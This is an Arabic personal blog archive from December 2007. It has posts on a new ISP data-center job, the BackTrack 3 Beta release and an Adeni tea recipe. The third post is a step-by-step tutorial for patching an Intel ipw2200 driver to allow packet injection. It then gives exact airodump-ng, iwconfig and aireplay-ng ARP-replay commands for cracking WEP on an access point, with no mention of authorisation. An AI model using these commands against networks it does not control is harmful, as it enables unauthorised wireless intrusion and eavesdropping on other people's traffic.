Archive for ديسمبر 2007
Moved to work in ISP Data Center

السلام عليكم ورحمه الله وبركاته ,, انتقلت قبل فترة بسيطة أسابيع محدودة إلى العمل في ISP Data Center طبعاً عملي السابق كان شي بسيط مقابل داتا سنتر والله أشياء لم أراها في حياتي وأقولها بكل صدق لست مؤهل للعمل في الداتا سنتر أجهزة وتقنيات يجب علي أن أجلس لتعلمها لكن مديري يقول لا يوجد أحد غيرك المناسب هذي وجهة نظره وأنا أحترمها وأقدرها الداتا سنتر لم يبدا العمل الرسمي إلى الان لكن تقريباً على وشك النهاية , وهذي فرصتي سوف أبذل كامل جهدي لتحقيق هدفي الذي أسمى إليه لا أستطيع أفصح عن جميع ما لدينا في الداتا سنتر لكن سوف اذكر بعضها
BuleCoat Proxy & Cache
Many Cisco Routers
Many Cisco Core Switches , Edge Switches , Load Balance Switches , DMZ Switches
And Firewalls Many Produces
Many Servers : Mail Servers , Web Servers , DNS Servers … etc
للاسف جميع السيرفرات Windows 2003 Servers ,, لا يوجد حتى سيرفر واحد لينوكس ودار نقاش بيني وبين مديري وفي النهاية قال أنا أحبه والله يا متعب وعارف أنه أقوى من الويندوز بكثير لكن للاسف لو حصلت مشكلة لنا من سوف يدعمنا وهوه محق لا يوجد دعم لو حصل مشكلة لنا لكن يبقى مشاكلة قليلة جداً عكس الويندوز ومستقر جداً , ولدينا تقنية VOIP وهيه تقنية جديدة ولم تأخذ انتشارها في السعودية بشكل كبير , وأيضاً الداتا سنتر سوف يكون اتصاله من نوع ATM وهيه تقنية عالية السرعة تستخدم في البنوك وشركات مزودين الانترنت , في الأيام القادمة سوف اعمل لي قائمة بما يجب علي تعلمه واتقانه ليس شرط أن أخذ شهادة فيه لكن الخبرة تكفي والشهادة لا تحدد الشخص أبداً ولكنها الخبرة وحب التعلم والعمل , لا تنسوني إخواني من الدعاء لي بالتوفيق في الدنيا والاخرة ,,,, أخوكم متعب
BackTrack 3 Beta
السلام عليكم ورحمه الله وبركاته ,, عيدكم مبارك بعد الزحمة
وكل عام وأنتم بخير ,,كنت أريد انزل هذا الموضوع في يوم صدور النسخة لكن لظروف العمل الي حتى في الأجازه مداومين ,,وبعده العيد انشغلت معايدة الأقارب والأخوان خلني أجل الموضوع والموضوع هوه صدور توزيعة BackTrack 3 التجريبية Beta في يوم الجمعة 5/12/1428هـ الموافق 14/12/2007
وتحتل توزيعة الباك تراك الرقم 1 من ضمن أفضل توزيعات السكيورتي وهذا حسب التصويت الذي أجري في سنة 2006 من موقع insecure.org http://sectools.org/sec-distros.html ,, وتوزيعة الباك تراك مبنية على SLAX (Slackware), ,ويوجد بها أدوات قوية وجبارة في السكيورتي والهاك Metasploit 3 , Ethercap , Kismet , Aircrack-ng ,,and more
جديد هذي النسخة
1/ تم تحديث الكرينل إلى 2.6.21
2/ تحديث أغلب البرامج إلى إصدارات أحدث
3/ دعم مجموعة كبيرة من كروت الواويرليس إضافة لدعم الانجكشن للكروت.
4/ تحسين شكل النسخة إلى الأفضل مع ثيم جميل
هذا أغلب الأضافات التي لمستها من خلال تجربتي للنسخة أتركم مع صور من جهازي بعد ثبيت النسخة عليه






النسخة تجريبية وليست مستقرة يوجد بها بعض المشاكل في التولز مثل Kismet يعمل كراش لما تفتحه وأيضاً أخطأ كثيرة في تحديد مسار كثير من التولز لما تفتحها يعطيك مسار الهوم مباشرة وليس مسارها الصحيح ويوجد مشكلة في برنامج التنصيب الخاص بالنسخة ليس مستقر واجهت مشكلة فيه عند تنصيبها ,,وهذي روابط للنسخة من الموقع الرسمي لمن أراد تحميلها وتجربتها يوجد نسخة CD والأخرى USB
http://www.remote-exploit.org/backtrack_download.html
أخوكم br0ken rlz
Howto injection with intel ipw2200

السلام عليكم ورحمه الله وبركاته ,, درسنا اليوم عن طريقة جعل أحد كروت انتل يعمل عليه اﻻنجكشن جميع كروت أنتل ﻻ تستطيع عن طريقها عمل انجكشن لزيادة الباكيت في كسر تشفير WEP , كان الحل للجميع أنه يشتري كرت جديد يدعم اﻻنجكشن وطبعاً يعتمد على chipset , في هذا الدرس سوف أشرح طريقة جعل أحد كروت انتل تدعم اﻻنجكشن والكرت هوه ipw2200 ,, نبدا على بركة لله
1/ نحتاج أن ننصب بعض الباكج الضرورية طبعاً تستطيع أن تنصبها حسب مدير الحزم الخاص بتوزيعتك
sudo apt-get install build-essential
sudo apt-get install linux-source
sudo apt-get install linux-headers-`uname -r`
sudo apt-get install sharutils
اﻻن نطبق اﻻمر التالي لعمل رابط لمجلد headers في المسار /usr/src/linux
sudo ln -s /usr/src/linux-headers-`uname -r`/ /usr/src/linux
ثم نطبق اﻷمر ويجب أن تكون مثل نتيجة اﻷمر
root@myrul3z:/usr/src# ls -l /usr/src/linux
lrwxrwxrwx 1 root src 41 2007-12-15 19:44 /usr/src/linux -> /usr/src/linux-headers-2.6.20-15-generic/
2/ لجعل كرت انتل يعمل عليه اﻻنجكشن يجب علينا تنصيب الباتش ضروري جداً والباتش يتركب اولاً على التعريف ثم تقوم بتنصيبه إصدار الباتش يوجد ﻷصدارات قديمة ولكن أخر إصدار لتعريف كرت ipw2200 لم ينزل حتى اﻻن وهوه ipw2200 1.2.2 إصدار الباتش الذي سوف نركبه سوف يكون اصداره 1.2.1 وأيضاً تعريف ieee80211 1.2.17 إضافة للباتش 1.2.1 لذا سوف نقوم بتحميل التالي
1-2/ تحميل تعريف ipw2200 version 1.2.1 الرابط http://ipw2200.sourceforge.net/downloads.php
2-2- / تحميل تعريف ieee80211 version 1.2.17 الرابط http://ieee80211.sourceforge.net/#downloads
3-2 / تحميل الباتش لتعريف ipw2200 version 1.2.1 الرابط http://www.box.net/shared/j3qvacbbmb
4-2 / إنشاء مجلد ووضع فيه جميع الملفات التي تم تحميلها
5-2/ فك الضغط عن الملفات التي تم تحميلها
tar -xvf ipw2200-1.2.1-inject_patch.tar.gz
tar -xvf ipw2200-*.tgz
tar -xvf ieee80211-*.tgz
6-2/ تطبيق الباتش على التعريف
patch -p0 < ipw2200-1.2.1-inject.patch
patch -p0 < ipw2200-1.2.1-inject_Makefile.patch
7-2/ تنصيب تعريف ieee80211
ملاحظة قبل التنصيب يجب علينا حذف الاصدار القديم وتنصيب اﻻصدار 1.2.17
root@myrul3z:/home/br0ken/injection# cd ieee80211-1.2.17
root@myrul3z:/home/br0ken/injection/ieee80211-1.2.17# sh remove-old
بعد تنفيذ اﻷمر sh remove-old لحذف النسخة سوف يسألك بعض اﻷسئلة ضع جميعها y
root@myrul3z:/home/br0ken/injection/ieee80211-1.2.17# make
root@myrul3z:/home/br0ken/injection/ieee80211-1.2.17# make install
8-2/ تنصيب تعريف ipw2200
ملاحظة قبل التصيب يجب علينا حذف الاصدار القديم وتنصيب اﻻصدار 1.2.1
root@myrul3z:/home/br0ken/injection# cd ipw2200-1.2.1
root@myrul3z:/home/br0ken/injection/ipw2200-1.2.1# sh remove-old
بعد تنفيذ اﻷمر sh remove-old لحذف النسخة سوف يسألك بعض اﻷسئلة ضع جميعها y
root@myrul3z:/home/br0ken/injection/ipw2200-1.2.1# make
root@myrul3z:/home/br0ken/injection/ipw2200-1.2.1# make install
9-2/ عمل ريستارت للجهاز
10-2/ التحقق من اﻻصدار لـ ieee80211 and ipw2200
root@myrul3z:/home/br0ken# dmesg | grep ipw
[ 19.940000] ipw2200: Intel(R) PRO/Wireless 2200/2915 Network Driver, 1.2.1dmprq
[ 19.940000] ipw2200: Copyright(c) 2003-2006 Intel Corporation
[ 20.092000] ipw2200: Detected Intel PRO/Wireless 2200BG Network Connection
[ 20.408000] ipw2200: Radio Frequency Kill Switch is On:
[ 20.408000] ipw2200: Detected geography ZZM (11 802.11bg channels, 0 802.11a channels)
root@myrul3z:/home/br0ken# dmesg | grep ieee
[ 19.768000] ieee80211_crypt: registered algorithm ‘NULL’
[ 19.824000] ieee80211: 802.11 data/management/control stack, 1.2.17
[ 19.824000] ieee80211: Copyright (C) 2004-2005 Intel Corporation <jketreno@linux.intel.com>
3/ تحميل الدرايف الجديد [ Load] وإنشاء انترفيس بأسم rtap0
راح يكون rtap0 للـ listening و eth* الـ injecting
sudo rmmod ipw2200
sudo modprobe ipw2200 rtap_iface=1
sudo ifconfig rtap0 up
4/ طريقة الهجوم بكرت ipw2200
أي كرت يدعم packets injection راح تقدر تستخدم جميع طرق الهجوم الموجودة في aireplay-ng لكن في كرت انتل مع patch injection سوف تكون محدودة على طرق معينة فقط يوجد طرق ﻻ تعمل مع الكرت الطرق التي تعمل مع كرت انتل هي 3 طرق فقط أما باقي الطرق ﻻ تعمل والله أعلم
interactive
arpreplay
chopchop
4-1/ سوف أشرح أحد طرق الهجوم لسبب ما أنها تختلف اختلاف بسيط عن الكروت التي تدعم packet injection من اﻷساس التقاط الباكيت باﻷداة airodump-ng وراح نستخدم النترفيس rtap0
airodump-ng -c 1 –bssid MAC-AP -w dump rtap0
4-2/ عمل fake للاكسس بوينت هذي الخطوة مهمة ﻷنه عشان تقدر ترسل arp request للاكسس بوينت ويقبلها ﻻزم الكلاينت يكون شابك associate وراح نستخدم الماك ادرس تبعه لذلك راح نسوي fake ونستخدم الماك ادرس الخاص بكرتنا
iwconfig eth1 essid SpeedTouch433793 channel 1 key s:fakekey mode managed
4-3/ استخدم طريقة الهجوم arpreplay ﻷرسال arp request للاكسس بوينت لزيادة الباكيت وكسر تشفير WEP
aireplay-ng -3 -b MAC-AP -h MAC-Client -i rtap0 eth1
وراح تشاهد الباكيت في ازدياد بشكل خيالي ,,, عملت فيديو تطبيقي للانجكشن عبر كرت انتل
واستخدمت فيه arpreplay attack لتحميل الفيديو اضغط هنا
وبكذا الواحد يوفر فلوسه لشراء كرت يدعم packet injection ويستخدم كرت انتل المدمج مع جهازه
إن شاء الله الدرس يكون مفيد لكم إخواني
أخوكم br0ken rlz
الشاي العدني إدمان غير طبيعي
السلام عليكم ورحمه الله وبركاته حبيت اليوم اغير جو شوي عن المواضيع التقنية ,,, الشاي العدني موضوعنا اليوم

شاي الصراحة لم اشربه إلا من فترة بسيطة وأدمنت عليه شاي طعمه لذيذ جدااااااً ,, طبعاً بداية شربي له كان في العمل من خلال القهوجي ومن شده إدماني عليه أخذت التركيبة السحرية من القهوجي وحاولت اسويه في البيت بس مايضبط مو نفس الي اشربه في العمل مدري ايش السالفة هل العيب مني ولا منه بحثت في النت عن طريقة التحضير طبعاً هيه نفسها الي اعطانيه القهوجي شكل ماضبطه صح بحاول اجرب اسويه أكثر من مرة إلين اضبطه ,,, اتركم مع طريقة التحضير , 1- براد فيه حوالي 4 كاسات ماء ,, 2- كاسه ونص سكر [ كاسه شاهي صغيرة حسب الرغبة ] ,, 3- 4ملاعق شاهي ليبتون ,, 4- 2قرنفل حسب الرغبة ,, 5- ربع ملعقة هيل مطحون ,, 6- شويه زنجبيل شي بسيط ,, 7- حليب بوني أو أبو قوس علبه إلى علبتين يوضع الماء على النار ويوضع معاه السكر والشاي والقرنفل والزنجبيل ويترك على نار هاديه حوالي 10 دقائق إلى ربع ساعة إلى أن يرسخ بعد ذلك اسكب الحليب في الترمس مع الهيل واسكب الشاي فوقه ,,, جربوا الشاي وراح تحبونه وتشربونه يومياً من واقع تجربة وبالعافية عليكم ,,, أخوكم متعب